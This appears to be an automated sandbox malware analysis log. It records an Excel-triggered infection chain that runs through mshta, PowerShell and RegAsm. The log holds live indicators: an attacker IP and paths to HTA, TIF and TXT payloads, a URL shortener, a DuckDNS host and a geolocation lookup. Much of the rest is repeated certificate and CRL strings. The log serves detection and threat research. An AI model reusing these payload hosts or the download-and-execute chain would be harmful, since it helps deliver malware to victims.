                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899B7018 URLDownloadToFileW,7_2_000007FE899B7018
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B73744D0.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /pitash HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /pitash HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /pitash HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /pitash HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.193.155Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8895-Connection: Keep-AliveHost: 192.3.193.155If-Range: "1ccb3-620b4202337ba"
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/wecreatedbuttersmoothbutterthings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.193.155Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/REDS.txt HTTP/1.1Host: 192.3.193.155Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 28 Aug 2024 01:17:45 GMTConnection: Keep-AliveHost: 192.3.193.155If-None-Match: "1ccb3-620b4202337ba"
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/REDS.txt HTTP/1.1Host: 192.3.193.155Connection: Keep-Alive
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: zhort.de
                  Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org
                  Source: global trafficDNS traffic detected: DNS query: cloudsave.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 0000000E.00000002.436681548.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000028B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155
                  Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/9VEB
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/=VEB
                  Source: powershell.exe, 0000000E.00000002.436681548.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000028B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/REDS.txt
                  Source: mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
                  Source: mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta6
                  Source: mshta.exe, 00000011.00000002.458485189.0000000004EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta:KWWS
                  Source: mshta.exe, 00000011.00000003.454822112.0000000000444000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.456910082.0000000000444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaC:
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaEB
                  Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaFC:
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac;EB
                  Source: mshta.exe, 00000004.00000003.407059010.0000000003055000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.451499028.0000000003175000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.454477370.0000000003175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htahttp://192.3.193.155/xampp/boz/bz/IEnetwor
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htak
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaq;EB
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htax;EB
                  Source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/w
                  Source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.472157211.000000001ADDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF
                  Source: powershell.exe, 00000014.00000002.472157211.000000001ADDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089
                  Source: powershell.exe, 00000007.00000002.430127425.000000001A765000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089$
                  Source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIFp
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2F1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACFA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2F1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001AD39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: RegAsm.exe, 0000000F.00000002.842261724.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSf
                  Source: RegAsm.exe, 0000000F.00000002.842261724.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpjf
                  Source: powershell.exe, 00000007.00000002.430127425.000000001A6FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
                  Source: powershell.exe, 00000007.00000002.423275187.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.423275187.0000000002B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
